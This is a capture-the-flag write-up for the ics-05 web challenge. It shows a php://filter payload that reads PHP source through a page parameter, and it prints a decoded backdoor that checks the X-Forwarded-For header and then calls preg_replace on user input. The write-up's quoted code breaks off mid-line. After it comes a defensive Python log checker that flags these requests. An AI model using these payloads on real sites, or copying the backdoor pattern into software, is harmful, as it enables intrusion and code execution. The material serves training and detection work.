攻防世界 (Attack and Defense World) web practice
ics-05
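Clicking around at first, I found only a single PHP page; clicking further, I noticed a ?page= parameter, so I tried using a PHP pseudo-protocol to read the source code: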
?page=php://filter/read=convert.base64-encode/resource=index.php
After reading and decoding the output, I found a backdoor:
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
    echo "<br >Welcome My Admin ! <br >";
    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];
    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace
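
The requests above from the defender's side, as an added example that is not part of the original write-up or the challenge code: a log check that flags a stream-wrapper scheme in the page parameter (including double-encoded forms) and requests carrying all three backdoor parameters. The combined log format, the finding labels and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r"^\s*([a-z][a-z0-9.+-]*)://", re.I)
BACKDOOR_PARAMS = {"pat", "rep", "sub"}  # parameter names from the decoded index.php

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return the list of findings for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    params = parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True)
    findings = []
    for key, raw in params:
        if key != "page":
            continue
        value = fully_decode(raw)
        scheme = SCHEME_RE.match(value)
        if scheme is None:
            continue  # plain page name, nothing to report
        if scheme.group(1).lower() == "php" and "convert.base64-encode" in value.lower():
            findings.append("php-filter-source-read")
        else:
            findings.append("wrapper:" + scheme.group(1).lower())
    if BACKDOOR_PARAMS <= {key for key, _ in params}:
        findings.append("backdoor-params")
    return findings

# Constructed sample lines (combined log format, documentation IP range).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=index HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=php://filter/read=convert.base64-encode/resource=index.php HTTP/1.1" 200 9000',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=PHP%253A%252F%252Ffilter%252Fread%253Dconvert.base64-encode%252Fresource%253Dindex.php HTTP/1.1" 200 9000',
    '203.0.113.7 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?pat=a&rep=b&sub=c HTTP/1.1" 200 600',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(inspect_line(entry), entry.split('"')[1])
```

The backdoor's X-Forwarded-For condition is not checked here because the default combined log format does not record that header; if the server logs it, a client-supplied value of 127.0.0.1 is a further signal.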